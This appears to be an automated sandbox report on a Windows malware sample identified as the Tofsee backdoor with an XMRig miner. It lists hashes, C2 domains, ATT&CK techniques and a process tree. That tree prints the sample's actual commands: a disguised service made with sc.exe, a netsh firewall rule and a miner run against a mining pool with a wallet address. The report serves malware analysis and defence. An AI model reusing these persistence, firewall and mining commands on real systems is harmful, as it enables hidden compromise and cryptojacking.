Overview

overview

10

Static

static

dridex

windows10-2004_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    20-01-2022 03:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    91afd4d395681d7acb2ca45e7a1817b3c828fad2e28e1c0ceaebb152176b20e1.exe

  • Size

    275KB

  • MD5

    063b2c711a6b8465d2a41d4d40f2ca44

  • SHA1

    3fd50df7aaba9b0d0bdbf6562edb27ddbf9c669d

  • SHA256

    91afd4d395681d7acb2ca45e7a1817b3c828fad2e28e1c0ceaebb152176b20e1

  • SHA512

    ccb06b5c65430058b8a59e707097fae94cd5a9318d031f01e5c27150ef6a53fb6c5778c238aa548cc52337c9b1a476c9f2d65d8c7854ac2bc53eab93584ae963

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

patmushta.info

ovicrush.cn

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\91afd4d395681d7acb2ca45e7a1817b3c828fad2e28e1c0ceaebb152176b20e1.exe
    "C:\Users\Admin\AppData\Local\Temp\91afd4d395681d7acb2ca45e7a1817b3c828fad2e28e1c0ceaebb152176b20e1.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1328
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\nhlvphui\
      2⤵
        PID:2320
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\xqytjrrr.exe" C:\Windows\SysWOW64\nhlvphui\
        2⤵
          PID:3804
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create nhlvphui binPath= "C:\Windows\SysWOW64\nhlvphui\xqytjrrr.exe /d\"C:\Users\Admin\AppData\Local\Temp\91afd4d395681d7acb2ca45e7a1817b3c828fad2e28e1c0ceaebb152176b20e1.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:3956
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description nhlvphui "wifi internet conection"
            2⤵
              PID:3660
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start nhlvphui
              2⤵
                PID:3472
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:3924
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 664
                  2⤵
                  • Program crash
                  PID:1396
              • C:\Windows\System32\WaaSMedicAgent.exe
                C:\Windows\System32\WaaSMedicAgent.exe 75bff49e4ae5a832d80fac94aca4e140 Lvb1gL9tqkCSSd897/dWMA.0.1.0.0.0
                1⤵
                • Modifies data under HKEY_USERS
                PID:2644
              • C:\Windows\SysWOW64\nhlvphui\xqytjrrr.exe
                C:\Windows\SysWOW64\nhlvphui\xqytjrrr.exe /d"C:\Users\Admin\AppData\Local\Temp\91afd4d395681d7acb2ca45e7a1817b3c828fad2e28e1c0ceaebb152176b20e1.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:3820
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:3516
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4000
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 516
                  2⤵
                  • Program crash
                  PID:4092
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 1328 -ip 1328
                1⤵
                  PID:1900
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3820 -ip 3820
                  1⤵
                    PID:2280
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService
                    1⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2188
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
                    1⤵
                      PID:3704
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1396

                    Network

                    MITRE ATT&CK Matrix ATT&CK v6

                    Initial Access

                    Execution

                    Persistence

                    New Service

                    1
                    T1050

                    Modify Existing Service

                    1
                    T1031

                    Registry Run Keys / Startup Folder

                    1
                    T1060

                    Privilege Escalation

                    New Service

                    1
                    T1050

                    Defense Evasion

                    Modify Registry

                    1
                    T1112

                    Credential Access

                    Discovery

                    Query Registry

                    1
                    T1012

                    System Information Discovery

                    2
                    T1082

                    Lateral Movement

                    Collection

                    Exfiltration

                    Command and Control

                    Impact

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Temp\xqytjrrr.exe
                      MD5

                      90d00271f52ffaadc6152f9d4241cf3e

                      SHA1

                      8a8bea803be4dbc5b5c243b6b54c74196e13df1f

                      SHA256

                      e9b07323df2e6b7753ab00544e9225a4d02855db9db853003fe2e0c2f2db7ddd

                      SHA512

                      37fe6d12115791d9f41e59d12d4ef5772b012a611a30d3039cf918be664a95a0981cf0871f2599c409eaa66c67c37dedd1adc11e5313e7d75a2919dffcce76d2

                      Download Submit
                    • C:\Windows\SysWOW64\nhlvphui\xqytjrrr.exe
                      MD5

                      90d00271f52ffaadc6152f9d4241cf3e

                      SHA1

                      8a8bea803be4dbc5b5c243b6b54c74196e13df1f

                      SHA256

                      e9b07323df2e6b7753ab00544e9225a4d02855db9db853003fe2e0c2f2db7ddd

                      SHA512

                      37fe6d12115791d9f41e59d12d4ef5772b012a611a30d3039cf918be664a95a0981cf0871f2599c409eaa66c67c37dedd1adc11e5313e7d75a2919dffcce76d2

                      Download Submit
                    • memory/1328-133-0x00000000009D0000-0x00000000009DD000-memory.dmp
                      Filesize

                      52KB

                      Download
                    • memory/1328-134-0x0000000000A00000-0x0000000000A13000-memory.dmp
                      Filesize

                      76KB

                      Download
                    • memory/1328-135-0x0000000000400000-0x000000000044C000-memory.dmp
                      Filesize

                      304KB

                      Download
                    • memory/3516-146-0x0000000003F80000-0x0000000003F90000-memory.dmp
                      Filesize

                      64KB

                      Download
                    • memory/3516-142-0x0000000004E00000-0x000000000500F000-memory.dmp
                      Filesize

                      2.1MB

                      Download
                    • memory/3516-144-0x0000000003F70000-0x0000000003F76000-memory.dmp
                      Filesize

                      24KB

                      Download
                    • memory/3516-138-0x0000000002AF0000-0x0000000002B05000-memory.dmp
                      Filesize

                      84KB

                      Download
                    • memory/3516-148-0x0000000003FD0000-0x0000000003FD5000-memory.dmp
                      Filesize

                      20KB

                      Download
                    • memory/3516-150-0x0000000009D00000-0x000000000A10B000-memory.dmp
                      Filesize

                      4.0MB

                      Download
                    • memory/3516-152-0x0000000003FE0000-0x0000000003FE7000-memory.dmp
                      Filesize

                      28KB

                      Download
                    • memory/3820-141-0x0000000000400000-0x000000000044C000-memory.dmp
                      Filesize

                      304KB

                      Download
                    • memory/4000-154-0x0000000002CF0000-0x0000000002DE1000-memory.dmp
                      Filesize

                      964KB

                      Download
                    • memory/4000-158-0x0000000002CF0000-0x0000000002DE1000-memory.dmp
                      Filesize

                      964KB

                      Download